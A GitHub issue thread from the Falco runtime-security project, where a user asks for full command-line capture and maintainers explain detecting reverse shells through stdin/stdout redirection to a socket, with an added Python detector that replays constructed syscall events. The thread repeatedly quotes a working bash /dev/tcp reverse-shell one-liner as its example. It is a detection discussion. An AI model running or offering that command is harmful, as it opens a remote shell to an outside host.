falcosecurity / falco

Cloud Native Runtime Security
https://falco.org
Apache License 2.0

support raw log output and capturing the full command line #3259

Closed Jumbo-WJB closed 1 week ago

Jumbo-WJB commented 3 months ago

Motivation

I hope Falco can support raw log output, such as all process creation, file read/write operations, etc. This can help in better contextual analysis. I also hope that the logs of process creation can be more detailed. Due to limitations with execve, commands like bash -i >& /dev/tcp/192.168.1.1/2333 0>&1 only show bash -i in the command line, and the rest of the command is not recorded. I have tried using audit and some eBPF tools but could not obtain the complete command line.

Feature

I wish for Falco to support raw log output, capturing all operations like process creation and file read/write. Additionally, I hope for more detailed logging of process creation, capturing the full command line even for complex commands like bash -i >& /dev/tcp/192.168.1.1/2333 0>&1.

Alternatives

I have considered using audit and some eBPF tools, but none of them were able to capture the complete command line for process creation.

Additional context

Adding this feature will significantly enhance contextual analysis capabilities, making it easier to investigate and understand the full scope of events.

Issif commented 3 months ago

Hello @Jumbo-WJB,

The tool you're looking for already exists; it's more or less the "big brother" of Falco. Both have been created by Sysdig and use the same underlying technologies/libs. This tool is https://github.com/draios/sysdig/, it allows you to capture the syscalls following filters (same fields and logic as those used in the Falco rules). The captures can then be read and passed through chisels to format the results.

To know more, you can read a post I wrote about it years ago https://github.com/Issif/sysdig-vs-malware or watch a talk I did at KCD Czech & Slovak two weeks ago https://www.youtube.com/watch?v=ScluwvDdYqg.

Moreover, as the libs and the syntax are the same, you can use the captures made by sysdig as a source for Falco, which allows you to tune the rules "on cold".

Jumbo-WJB commented 3 months ago

@Issif Thank you. I will look into the tools and the YouTube talk.

Jumbo-WJB commented 3 months ago

Through sysdig and YouTube, I found that sysdig and Falco are great tools. However, regarding the command bash -i >& /dev/tcp/192.168.1.1/2333 0>&1, I discovered that using execve cannot capture the full command line because the commands after the pipe symbol are executed within the shell interpreter without creating a new subprocess. Therefore, using execve for this command only yields the simple result bash -i. Of course, the command bash -i >& /dev/tcp/192.168.1.1/2333 0>&1 can be detected and alerted by monitoring the file descriptors of the bash process. However, if I want to capture the full command line, can Falco help me with this?

Issif commented 3 months ago

I see your point; I did some tests on my side. Indeed, I wasn't able to catch the exact command used to create the reverse shell.

1267 12:34:09.309076762 0 bash (15660.15660) < execve res=0 exe=bash args=-i. tid=15660(bash) pid=15660(bash) ptid=14475(bash) cwd=<NA> fdlimit=1073741816 pgft_maj=0 pgft_min=54 vm_size=1800 vm_rss=4 vm_swap=0 comm=bash cgroups=cpuset=/system.slice/docker-a99860c5ab2331098d00fba3948beb55f07f34addff0d7f40... env=HOSTNAME=a99860c5ab23.PWD=/.HOME=/root.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00... tty=34816 pgid=20 loginuid=-1(<NONE>) flags=1(EXE_WRITABLE) cap_inheritable=0 cap_permitted=A80425FB cap_effective=A80425FB exe_ino=475 exe_ino_ctime=2024-04-08 09:29:48.832867775 exe_ino_mtime=2022-01-06 16:23:33.000000000 uid=0(<NA>) trusted_exepath=/usr/bin/bash

On the other hand, it is not the philosophy of Falco to "capture" this whole command; it was created to detect the end result, which is the reverse shell, in other words the redirection of stdin/stdout to a network connection. We have a rule for that: https://falco.org/docs/reference/rules/default-rules/#Redirect_STDOUT/STDIN_to_Network_Connection_in_Container and you can find a blog post from Sysdig which explains what reverse shells are and how to detect them with Falco https://sysdig.com/blog/reverse-shell-falco-sysdig-secure/
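
The two comments above (the one explaining why execve only ever yields "bash -i", and the one pointing at the stdin/stdout redirection rule) describe one mechanism: the forked child emulates /dev/tcp with socket() and connect(), dup2()s that socket onto fds 1, 2 and 0 for ">&" and "0>&1", and only then calls execve(), so the command line carries no trace of the redirection. What follows is an added example, not code from Falco, sysdig or either commenter. It replays a constructed per-process syscall stream (the event dicts, pids, addresses and the "socket:"/"file:" labels are assumptions standing in for what the kernel driver reports, e.g. Falco's fd.type field) and shows that an execve-only logger records just ['bash', '-i'] for the pid in the capture above, while tracking the fd table raises an alert for each stdio fd that comes to refer to a network socket. A file redirection and an ordinary network client are included to show the check does not fire on them.

```python
# Added example (not Falco's or sysdig's code): toy fd-table replay that flags
# the pattern behind `bash -i >& /dev/tcp/192.168.1.1/2333 0>&1`.
from dataclasses import dataclass, field

STDIO = (0, 1, 2)


@dataclass
class Proc:
    comm: str
    # fd number -> label; "socket:<peer>" or "file:<path>" (assumed labels,
    # standing in for the fd type/name the kernel driver would report)
    fds: dict = field(default_factory=dict)


def is_socket(label: str) -> bool:
    return label.startswith("socket:")


def replay(events):
    """Replay constructed events in order.

    Returns (execve_view, alerts):
      execve_view: pid -> argv as an execve-only logger would record it
      alerts: (pid, comm, target_fd, label) whenever a dup-family call makes
              fd 0, 1 or 2 refer to a network socket
    """
    procs: dict = {}
    execve_view: dict = {}
    alerts = []
    for ev in events:
        pid = ev["pid"]
        p = procs.setdefault(pid, Proc(comm=ev["comm"]))
        kind = ev["type"]
        if kind == "execve":
            execve_view[pid] = list(ev["args"])
            p.comm = ev["args"][0]
            # the fd table survives execve (stdio is not CLOEXEC), keep p.fds
        elif kind == "open":
            p.fds[ev["res"]] = "file:" + ev["name"]
        elif kind == "socket":
            p.fds[ev["res"]] = "socket:unconnected"
        elif kind == "connect":
            p.fds[ev["fd"]] = "socket:" + ev["addr"]
        elif kind in ("dup", "dup2", "dup3"):
            src, dst = ev["fd"], ev["res"]
            label = p.fds.get(src)
            if label is None or src == dst:
                continue  # unknown source fd, or dup2(n, n) which is a no-op
            p.fds[dst] = label
            if dst in STDIO and is_socket(label):
                alerts.append((pid, p.comm, dst, label))
        elif kind == "close":
            p.fds.pop(ev["fd"], None)
    return execve_view, alerts


# Constructed event stream (assumed): the child forked by the interactive
# shell, using the pid from the capture above, performing the redirections
# before it execs `bash -i`.
REVERSE_SHELL_EVENTS = [
    {"pid": 15660, "comm": "bash", "type": "socket", "res": 3},
    {"pid": 15660, "comm": "bash", "type": "connect", "fd": 3, "addr": "192.168.1.1:2333"},
    {"pid": 15660, "comm": "bash", "type": "dup2", "fd": 3, "res": 1},  # >&   stdout -> socket
    {"pid": 15660, "comm": "bash", "type": "dup2", "fd": 1, "res": 2},  # >&   stderr -> stdout
    {"pid": 15660, "comm": "bash", "type": "dup2", "fd": 1, "res": 0},  # 0>&1 stdin  -> stdout
    {"pid": 15660, "comm": "bash", "type": "close", "fd": 3},
    {"pid": 15660, "comm": "bash", "type": "execve", "args": ["bash", "-i"]},
]

# Constructed benign activity (assumed): a file redirection and a network
# client that never wires its socket to stdio.
BENIGN_EVENTS = [
    {"pid": 200, "comm": "sh", "type": "open", "res": 3, "name": "/tmp/out.txt"},
    {"pid": 200, "comm": "sh", "type": "dup2", "fd": 3, "res": 1},  # cat ... > /tmp/out.txt
    {"pid": 200, "comm": "sh", "type": "close", "fd": 3},
    {"pid": 200, "comm": "sh", "type": "execve", "args": ["cat", "/etc/hostname"]},
    {"pid": 300, "comm": "curl", "type": "socket", "res": 4},
    {"pid": 300, "comm": "curl", "type": "connect", "fd": 4, "addr": "203.0.113.10:443"},
    {"pid": 300, "comm": "curl", "type": "close", "fd": 4},
]


if __name__ == "__main__":
    view, found = replay(REVERSE_SHELL_EVENTS + BENIGN_EVENTS)
    print("execve-only view:", view)
    for pid, comm, fd, label in found:
        print(f"ALERT pid={pid} comm={comm}: fd {fd} now refers to {label}")
```

The execve-only view for pid 15660 is exactly what the capture above shows (args=-i), while the dup2 events produce three alerts, one per stdio fd; the file redirection and the curl process produce none. In Falco terms this is the same idea as the linked default rule, which keys on the dup-family syscalls rather than on the command string, so the full redirection text is never needed to catch the reverse shell.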

poiana commented 1 week ago

Issues go stale after 90d of inactivity.

Mark the issue as fresh with /remove-lifecycle stale.

Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle stale